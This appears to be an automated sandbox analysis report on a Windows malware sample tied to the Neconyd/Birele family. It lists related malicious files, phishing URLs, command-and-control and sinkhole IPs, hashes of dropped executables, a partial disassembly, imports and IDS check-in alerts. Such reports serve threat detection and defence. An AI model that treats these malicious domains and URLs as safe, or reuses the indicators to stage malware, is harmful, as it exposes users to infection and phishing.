                                                                                                                                                                                                              RfdNuhaVvG.exeGet hashmaliciousSakula RATBrowse
                                                                                                                                                                                                              • www.savmpet.com/photo/bcyybe-1288432018.jpg?resid=5281296
                                                                                                                                                                                                              uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • lygyvuj.com/login.php
                                                                                                                                                                                                              qIIGdGOTWO.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • ow5dirasuek.com/342/85.html
                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              ow5dirasuek.combd0wJGTae5.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 52.34.198.229
                                                                                                                                                                                                              HUo09bfA3g.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 52.34.198.229
                                                                                                                                                                                                              cnzWgjUhS2.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 52.34.198.229
                                                                                                                                                                                                              Z0rY97IU6r.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 52.34.198.229
                                                                                                                                                                                                              2VJZxIY76V.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 52.34.198.229
                                                                                                                                                                                                              qIIGdGOTWO.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 52.34.198.229
                                                                                                                                                                                                              O0prB0zCWi.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 52.34.198.229
                                                                                                                                                                                                              djvu452.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 52.34.198.229
                                                                                                                                                                                                              gdvfd35.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 52.34.198.229
                                                                                                                                                                                                              v48ge.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 52.34.198.229
                                                                                                                                                                                                              mkkuei4kdsz.combd0wJGTae5.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 15.197.204.56
                                                                                                                                                                                                              HUo09bfA3g.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 15.197.204.56
                                                                                                                                                                                                              cnzWgjUhS2.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 64.225.91.73
                                                                                                                                                                                                              Z0rY97IU6r.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 64.225.91.73
                                                                                                                                                                                                              2VJZxIY76V.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 64.225.91.73
                                                                                                                                                                                                              qIIGdGOTWO.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 64.225.91.73
                                                                                                                                                                                                              O0prB0zCWi.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 64.225.91.73
                                                                                                                                                                                                              djvu452.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 64.225.91.73
                                                                                                                                                                                                              gdvfd35.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 64.225.91.73
                                                                                                                                                                                                              v48ge.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 64.225.91.73
                                                                                                                                                                                                              lousta.netbd0wJGTae5.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 193.166.255.171
                                                                                                                                                                                                              HUo09bfA3g.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 193.166.255.171
                                                                                                                                                                                                              cnzWgjUhS2.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 193.166.255.171
                                                                                                                                                                                                              Z0rY97IU6r.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 193.166.255.171
                                                                                                                                                                                                              2VJZxIY76V.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 193.166.255.171
                                                                                                                                                                                                              qIIGdGOTWO.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 193.166.255.171
                                                                                                                                                                                                              O0prB0zCWi.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 193.166.255.171
                                                                                                                                                                                                              djvu452.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 193.166.255.171
                                                                                                                                                                                                              v48ge.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 193.166.255.171
                                                                                                                                                                                                              moviename.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 193.166.255.171
                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              FUNETASFIbd0wJGTae5.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 193.166.255.171
                                                                                                                                                                                                              HUo09bfA3g.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 193.166.255.171
                                                                                                                                                                                                              Update-KB4890-x86.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 193.166.255.171
                                                                                                                                                                                                              Update-KB4890-x86.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 193.166.255.171
                                                                                                                                                                                                              document.log.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 193.166.255.171
                                                                                                                                                                                                              j3Lr4Fk7Kb.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                              • 86.50.36.169
                                                                                                                                                                                                              nabarm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 130.232.111.233
                                                                                                                                                                                                              splarm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 192.98.38.193
                                                                                                                                                                                                              mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                              • 157.24.20.223
                                                                                                                                                                                                              nklarm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 193.166.100.123
                                                                                                                                                                                                              AMAZON-02USbd0wJGTae5.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 52.34.198.229
                                                                                                                                                                                                              dlr.arm6.elfGet hashmaliciousOkiruBrowse
                                                                                                                                                                                                              • 54.217.10.153
                                                                                                                                                                                                              zmap.ppc.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                              • 54.171.230.55
                                                                                                                                                                                                              https://woobox.com/sf4hxrGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                              • 52.217.197.137
                                                                                                                                                                                                              https://u7990385.ct.sendgrid.net/ls/click?upn=u001.oZ6GXC16Ztdw1ob-2F3C5yow-2FsK2YC4S8s269h9OLgp-2FGcQesCtXDXKgCEAF90Sa3OUL2ncGoAKstQjRhddelr-2Bx3frrehyL8aaBbhAx-2Fm3uQTToUZwzw9vU-2BHl4N8-2FbXNrXNM8F2aafYGXvb9twEoQeHC7ZwjccAi1SjLazzmL714x6k-2BjB-2FYwt496nNWzarkpA5xghtVvgqYssmknAftbQJOVkiDX5sql0puMOlG6Ca2eid008YPu-2FJJAayp-2BNXls84A_lhEpvcamcm95WhC017PRgRonrgi5omZ3brQwNa5yLk0xxDl3uLY9zV0ZhBwsp9AfIBgWj8srFe156S5Zns8ZjIc0B22GBm-2FhZ3msRvLKzUyGIuCFlA1E-2FK-2F4jc3IgU8qM5k5KxMmIwIRDSCQDvTZvmwB5zeTeqWWEJR7CvWSpeaqIj3hj5IgcRcoPBdptLYrUK3YLUsGuU0Nn50M3ArOROvseGYqZul0QkeqtDR41-2FsPFt-2Bw0YWW2P5gsCDH4XINxncIhICPIqlacC1ih-2B-2BRAhsouCrf5nolEyzWx0VnR2OrLuGwvR4-2BmBTgXGq5SQJ3CbNvM-2FaB5BLerpFqmqjPC-2FBlK6th1iVrhfmtBEFKLash-2FnkPpQ9qFxGwWTexJMh100AS4PilK2-2BJDfvjssuxk2jP-2BTagNOazV2F1Jk9Mugr3y7E9SivEGWyUbzdMThmnpVydb1qOFwMiocztErv1WWaB8B20Oa2SLt-2BLBsMdusfLwd3NNzPre6el-2F-2BIwBxDAqBb9JLV6vOLzfaD2L4-2BEuPbgzcrscVtaCNyARGoPUKi03imhTbJEcig8L4weEiABND5vwKtA-2FhKo5AjxecXMO22Vq7Og2y7v-2BJNgFB9rr-2Bm4W45XZxFP39Dqi18SUPOKX4pHFrdACciPinuj2QtBtIGNjV46-2Bve9hu0g1-2FpG1tOVv9Ebn32k-2Bl6CF6b6jzS3aTQvZkWKNIwLx5CoGs9uomn9yZPi6QaiSTeQkZ1uHupSYpVxbBCb-2FUyo6kMlbB0P27ShEzUFVY-2FpfPcfFofTKD4p7rklaM-2FIuG8-2F3ytR7SJ7I8GmSP8NTWs4vu3NTpV5MkgHfjeFoK-2BDQh6M7S2ys2qIf8m3qiLtFMHY6p7m4ep8JZqbC0axloFSX-2Fzbz51ZW-2BsyQEEbRqwx0S1i4lo9NhRXrfXOvn0A83bBDk31g9QfoWTGhHCjSEfuca9KJwe0GCABYAuqYeYHMc5qXhPv86r0l0ldRpwe39V9LJ5m6Go-3DGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 65.9.66.43
                                                                                                                                                                                                              https://hotmail.cdisaomiguel.com.brGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 18.245.31.5
                                                                                                                                                                                                              https://tas-pe.com/ahowe@europait.net#ahowe@europait.netGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                              • 18.245.31.121
                                                                                                                                                                                                              https://us.pbe.encryption.symantec.com/login.html?msgUserId=13963009e4fab12e&enterprise=questdiagnostics&rrRegcode=9hfnDzwZ&locale=en_USGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 52.14.194.37
                                                                                                                                                                                                              HUo09bfA3g.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 52.34.198.229
                                                                                                                                                                                                              ae713827-e32c-f66b-fbdb-5405db450711.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 75.2.57.54
                                                                                                                                                                                                              TANDEMUSbd0wJGTae5.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 15.197.204.56
                                                                                                                                                                                                              HUo09bfA3g.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 15.197.204.56
                                                                                                                                                                                                              https://send-space.s3.eu-north-1.amazonaws.com/de.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 15.197.193.217
                                                                                                                                                                                                              FW CMA SHZ Freight invoice CHN1080769.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                              • 15.197.225.128
                                                                                                                                                                                                              BbkbL3gS6s.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 15.197.137.111
                                                                                                                                                                                                              Reminders for Msp-partner_ Server Alert.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                              • 15.197.193.217
                                                                                                                                                                                                              Viridine84.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                              • 15.197.148.33
                                                                                                                                                                                                              la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 15.211.66.93
                                                                                                                                                                                                              http://bigfoot99.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 15.197.193.217
                                                                                                                                                                                                              https://ascot.auditboardapp.com/task-redirect/4113?source=email&CTA=taskTitleLink&notificationId=044e55a3-481a-4a33-91c7-abbaf803b1d7&projectId=367&taskId=4113&notificationType=WS-task-submittedGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 15.197.213.252
                                                                                                                                                                                                              No context
                                                                                                                                                                                                              No context
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\nNX5KYQRhg.exe
                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):82768
                                                                                                                                                                                                              Entropy (8bit):6.931973987188612
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:nd9dseIOcE93bIvYvZEyF4EEOF6N4yS+AQmZcl/52izbR9Xwzz:PdseIOMEZEyFjEOFqTiQmOl/5xPvw3
                                                                                                                                                                                                              MD5:DCC8263D314F19A3A35E32EDFCCDC942
                                                                                                                                                                                                              SHA1:D4AD269F9FEDD8B359B1AD2A380A200E92656D74
                                                                                                                                                                                                              SHA-256:7BF175DA76679D24C80F78BE8A38E9D71286F944885CBD3B349B1E5AA43CEF17
                                                                                                                                                                                                              SHA-512:4B9BCC64347700EC9998A8A11B852A5FA97E232B8E4335C29187695B935963D36D7DC4B66AE057971E13E5F40F19FFE83032EAF3423BDD9762CB57E800937A2A
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>...m...m...m.m.m...m.m.m...m^..m...m^..m...m...m.m.m.m...m.m.m...mRich...m................PE..L...]..P............................F.............@.........................................................................|...........................PM..............................................@............................................text............................... ..`.rdata..D!......."..................@..@.data...,q..........................@...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):100
                                                                                                                                                                                                              Entropy (8bit):1.8901865117490424
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:gtqyu/JSzv/qvdOdFV:gwDAzviU/
                                                                                                                                                                                                              MD5:11598988334FA23E5801B318FADCDD95
                                                                                                                                                                                                              SHA1:F116E9AB51BE03B2D8BC69A04C7269A1C43E7917
                                                                                                                                                                                                              SHA-256:1EADB45BFEB7402242E4FCBFEE5CC925A260AD22769AD21B74BD0788769EC5B5
                                                                                                                                                                                                              SHA-512:08FAD81A0E5065A526DC4B9B317CC6AD4CC37C1A82306645B104718419AD1019B0D9D597F2DF7CC87D82F12C4C71B9B7D646D890BE28B9982B5A3F510D239D2C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Preview:-x.x.x.x.x.x6x.x.xxxIxKxKxOxLxAxLx@xIxLxHxIxIxOxHxMxNxHxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\omsecor.exe
                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):82768
                                                                                                                                                                                                              Entropy (8bit):6.93198150938138
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:Jd9dseIOcE93bIvYvZEyF4EEOF6N4yS+AQmZcl/52izbR9Xwzz:JdseIOMEZEyFjEOFqTiQmOl/5xPvw3
                                                                                                                                                                                                              MD5:1FB6FB78751B952FE1D6BEBA89C93830
                                                                                                                                                                                                              SHA1:74DF9E9309715128ADD09CF3FA3E80D670B81ECD
                                                                                                                                                                                                              SHA-256:E4020F1799722258E62AFD948A5DB176524B8E1831D6738C82B5ADF4D835A1A0
                                                                                                                                                                                                              SHA-512:A25D8943FE382B8B0DDF9DDBDED01A9405C068ED56CA1B70B852DA83E39CEA2E3F65084703D9D66148648F8189F6B236E23460F9014200CBA1903694449260C7
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>...m...m...m.m.m...m.m.m...m^..m...m^..m...m...m.m.m.m...m.m.m...mRich...m................PE..L......P............................F.............@.........................................................................|...........................PM..............................................@............................................text............................... ..`.rdata..D!......."..................@..@.data...,q..........................@...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                              Entropy (8bit):6.931971441078146
                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                              File name:nNX5KYQRhg.exe
                                                                                                                                                                                                              File size:82'768 bytes
                                                                                                                                                                                                              MD5:44a881b87bb2d5dfe7062b9a7538425f
                                                                                                                                                                                                              SHA1:682abf7611b349bb614207e0fcca057ab84389a6
                                                                                                                                                                                                              SHA256:fc22b8c7e16c145772129e466d1977f14f09c1302da688eb96863e409cbb6a58
                                                                                                                                                                                                              SHA512:5789c8c42bc75efdba39d1715a71c40142dd8946c40a127b29c9b7c575ae51186e2d241dd287791d6d7e501b23132282cf2ce8d7d87d60285272439233c23bd5
                                                                                                                                                                                                              SSDEEP:1536:Xd9dseIOcE93bIvYvZEyF4EEOF6N4yS+AQmZcl/52izbR9Xwzz:fdseIOMEZEyFjEOFqTiQmOl/5xPvw3
                                                                                                                                                                                                              TLSH:73839D95B6F88076E9A318B0627CE9929CBDBEB515A0D0C3D350AC871EE13D2D73435B
                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>...m...m...m.m.m...m.m.m...m^..m...m^..m...m...m...m.m.m...m.m.m...mRich...m................PE..L...+..P...................
                                                                                                                                                                                                              Icon Hash:00928e8e8686b000
                                                                                                                                                                                                              Entrypoint:0x40b346
                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                              Digitally signed:true
                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                              DLL Characteristics:
                                                                                                                                                                                                              Time Stamp:0x50B39C2B [Mon Nov 26 16:43:23 2012 UTC]
                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                              OS Version Major:4
                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                              File Version Major:4
                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                              Subsystem Version Major:4
                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                              Import Hash:08b67a9663d3a8c9505f3b2561bbdd1c
                                                                                                                                                                                                              Signature Valid:false
                                                                                                                                                                                                              Signature Issuer:CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                                                                              Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                              Error Number:-2146869232
                                                                                                                                                                                                              Not Before, Not After
                                                                                                                                                                                                              • 02/09/2021 20:25:58 01/09/2022 20:25:58
                                                                                                                                                                                                              Subject Chain
                                                                                                                                                                                                              • CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                                                                              Version:3
                                                                                                                                                                                                              Thumbprint MD5:07BA2F139D35455A934AB0CED10CBE41
                                                                                                                                                                                                              Thumbprint SHA-1:5A257D333718C4B468A5DBC6643348AF667AEE3D
                                                                                                                                                                                                              Thumbprint SHA-256:F66C648A39C2B4845719707319B96BA37A6EFC854D02D4AB3EDA1B2DA853B7EB
                                                                                                                                                                                                              Serial:3300000439F61F7A676DA000AF000000000439
                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                              mov ebp, esp
                                                                                                                                                                                                              mov eax, 00001800h
                                                                                                                                                                                                              call 00007F016532D762h
                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                              push esi
                                                                                                                                                                                                              push edi
                                                                                                                                                                                                              mov edi, dword ptr [0040E0B0h]
                                                                                                                                                                                                              mov esi, 00000400h
                                                                                                                                                                                                              push esi
                                                                                                                                                                                                              lea eax, dword ptr [ebp-00000800h]
                                                                                                                                                                                                              push eax
                                                                                                                                                                                                              xor ebx, ebx
                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                              call edi
                                                                                                                                                                                                              push 0040F4FCh
                                                                                                                                                                                                              lea eax, dword ptr [ebp-00000800h]
                                                                                                                                                                                                              call 00007F016532561Ah
                                                                                                                                                                                                              test eax, eax
                                                                                                                                                                                                              pop ecx
                                                                                                                                                                                                              je 00007F016532B55Fh
                                                                                                                                                                                                              lea eax, dword ptr [ebp-00001800h]
                                                                                                                                                                                                              push eax
                                                                                                                                                                                                              call 00007F016532AD96h
                                                                                                                                                                                                              test eax, eax
                                                                                                                                                                                                              pop ecx
                                                                                                                                                                                                              jne 00007F016532B54Eh
                                                                                                                                                                                                              push esi
                                                                                                                                                                                                              lea eax, dword ptr [ebp-00000800h]
                                                                                                                                                                                                              push eax
                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                              call edi
                                                                                                                                                                                                              push 00000001h
                                                                                                                                                                                                              lea eax, dword ptr [ebp-00000800h]
                                                                                                                                                                                                              push eax
                                                                                                                                                                                                              push 0040F414h
                                                                                                                                                                                                              push 0040F1D8h
                                                                                                                                                                                                              push 80000001h
                                                                                                                                                                                                              call 00007F0165326B46h
                                                                                                                                                                                                              add esp, 14h
                                                                                                                                                                                                              test eax, eax
                                                                                                                                                                                                              push 00000004h
                                                                                                                                                                                                              je 00007F016532B507h
                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                              push 00000003h
                                                                                                                                                                                                              jmp 00007F016532B50Bh
                                                                                                                                                                                                              call dword ptr [0040E064h]
                                                                                                                                                                                                              push eax
                                                                                                                                                                                                              push 00000006h
                                                                                                                                                                                                              call 00007F016532A8B3h
                                                                                                                                                                                                              add esp, 0Ch
                                                                                                                                                                                                              call 00007F016532B3F3h
                                                                                                                                                                                                              call 00007F016532AC1Dh
                                                                                                                                                                                                              test eax, eax
                                                                                                                                                                                                              jne 00007F016532B4F4h
                                                                                                                                                                                                              call 00007F016532AC93h
                                                                                                                                                                                                              test eax, eax
                                                                                                                                                                                                              je 00007F016532B563h
                                                                                                                                                                                                              push 00002710h
                                                                                                                                                                                                              call dword ptr [0040E070h]
                                                                                                                                                                                                              push 00000004h
                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                              push 00000009h
                                                                                                                                                                                                              call 00007F016532A884h
                                                                                                                                                                                                              add esp, 0Ch
                                                                                                                                                                                                              push esi
                                                                                                                                                                                                              lea eax, dword ptr [ebp+00000000h]
                                                                                                                                                                                                              Programming Language:
                                                                                                                                                                                                              • [ASM] VS2005 build 50727
                                                                                                                                                                                                              • [ C ] VS2005 build 50727
                                                                                                                                                                                                              • [LNK] VS2005 build 50727
                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xf77c0xb4.rdata
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0xf6000x4d50
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xf6a80x40.rdata
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0xe0000x1b4.rdata
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                              .text0x10000xcc180xce007d17b3af3ad18f4a94d7ab9fe07eac18False0.5967650182038835data6.6299319364593226IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                              .rdata0xe0000x21440x220056d9054057018e96543087e97c2a076eFalse0.4463465073529412data4.458482003449311IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                              .data0x110000x1712c0x2009159e4683d74ea27f29c3b096294f663False0.466796875data3.7016590486098133IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                              WININET.dllHttpSendRequestW, InternetConnectW, HttpOpenRequestW, InternetSetPerSiteCookieDecisionW, InternetOpenUrlW, InternetAttemptConnect, InternetOpenW, InternetReadFile, InternetClearAllPerSiteCookieDecisions, InternetCloseHandle, InternetQueryDataAvailable, InternetSetOptionW
                                                                                                                                                                                                              SHLWAPI.dllStrStrIW, PathMatchSpecW, PathCombineW, wvnsprintfW, StrStrIA, PathRemoveFileSpecW
                                                                                                                                                                                                              KERNEL32.dllTerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, GetVersionExA, HeapReAlloc, RtlUnwind, WideCharToMultiByte, MultiByteToWideChar, HeapCreate, CopyFileW, CreateThread, WaitForMultipleObjects, GetTickCount, DeleteFileW, CreateProcessW, SetUnhandledExceptionFilter, ExitProcess, GetLastError, LoadLibraryW, GetProcAddress, Sleep, VirtualProtect, GetPrivateProfileIntW, ExpandEnvironmentStringsW, GetPrivateProfileStringW, FindFirstFileW, SetFilePointer, SetEndOfFile, GetVersionExW, HeapAlloc, SetWaitableTimer, SystemTimeToFileTime, CreateWaitableTimerW, FindNextFileW, HeapFree, ReadFile, GetModuleFileNameW, GetFileTime, WaitForSingleObject, GetTimeZoneInformation, CreateFileW, CloseHandle, GetFileSizeEx, VirtualFree, GetProcessHeap, GetCurrentDirectoryW, VirtualAlloc, VirtualQuery, GetSystemTime, GetFileSize, FindClose, WriteFile, GetLocalTime, GetModuleHandleW, GetCommandLineW
                                                                                                                                                                                                              USER32.dllGetWindowLongW, DispatchMessageW, GetForegroundWindow, CharLowerW, CreateWindowExW, FindWindowW, PeekMessageW, SetForegroundWindow, GetSystemMetrics, MessageBoxW, SetWindowPos, SetWindowLongW, SetParent
                                                                                                                                                                                                              ADVAPI32.dllRegOpenKeyExW, RegEnumKeyExW, RegQueryValueExW, RegSetValueExW, RegCreateKeyExW, RegCloseKey
                                                                                                                                                                                                              SHELL32.dllSHGetFolderPathW
                                                                                                                                                                                                              ole32.dllCoCreateInstance, OleInitialize, CoInitialize
                                                                                                                                                                                                              OLEAUT32.dllSysFreeString, VariantInit, SysAllocString, VariantClear
                                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                              2024-11-01T16:21:58.969242+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.650009193.166.255.17180TCP
                                                                                                                                                                                                              2024-11-01T16:22:01.694283+01002016998ET MALWARE Connection to Fitsec Sinkhole IP (Possible Infected Host)1192.168.2.649709193.166.255.17180TCP
                                                                                                                                                                                                              2024-11-01T16:22:10.199354+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.649709193.166.255.17180TCP
                                                                                                                                                                                                              2024-11-01T16:22:18.801892+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.649727193.166.255.17180TCP
                                                                                                                                                                                                              2024-11-01T16:22:19.281249+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.649763TCP
                                                                                                                                                                                                              2024-11-01T16:22:19.623901+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.64976915.197.204.5680TCP
                                                                                                                                                                                                              2024-11-01T16:22:20.790141+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.64977652.34.198.22980TCP
                                                                                                                                                                                                              2024-11-01T16:22:20.910667+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz152.34.198.22980192.168.2.649776TCP
                                                                                                                                                                                                              2024-11-01T16:22:20.910667+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst152.34.198.22980192.168.2.649776TCP
                                                                                                                                                                                                              2024-11-01T16:22:29.863054+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.649788193.166.255.17180TCP
                                                                                                                                                                                                              2024-11-01T16:22:38.613596+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.649830193.166.255.17180TCP
